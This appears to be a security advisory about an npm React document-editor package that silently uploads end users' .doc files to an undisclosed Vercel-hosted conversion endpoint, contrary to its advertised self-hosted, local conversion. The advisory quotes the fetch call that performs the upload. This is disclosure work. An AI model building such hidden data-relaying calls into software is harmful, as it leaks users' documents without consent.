---

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7c82ee7b879d66ba2fb79ec7ad7fee47623c2c3b68c8a925510b1f42cd1e3456)

The DocumentEditor React component exported by this package, when an end-user opens a.doc file, POSTs the raw file bytes to https://converter-apis.vercel.app/api/convert — a generic Vercel-hosted endpoint that is not OnlyOffice and is not disclosed in the package's README or API documentation. The README advertises a self-hosted OnlyOffice/X2T integration (X2T conversion runs locally in WASM), so integrators reasonably expect document content to stay on their own infrastructure. The.doc handling path in dist/index.cjs:565 (fetch("https://converter-apis.vercel.app/api/convert", { method: "POST", body: new Blob([arrayBuffer], { type: "application/msword" }) })) silently relays end-user document bytes to the package author's chosen third-party endpoint with no consent UI, no documentation, and no configuration option to disable or redirect the upload. The destination is a generic free-tier Vercel hostname rather than an OnlyOffice domain, breaking the trust expectation of the advertised self-hosted editor. The postinstall script that copies static assets into the host project's public/ directory, and the child_process/fetch references inside the bundled X2T WASM toolchain, are documented and purpose-matched (X2T is the OnlyOffice document conversion tool); those are not the basis for the verdict.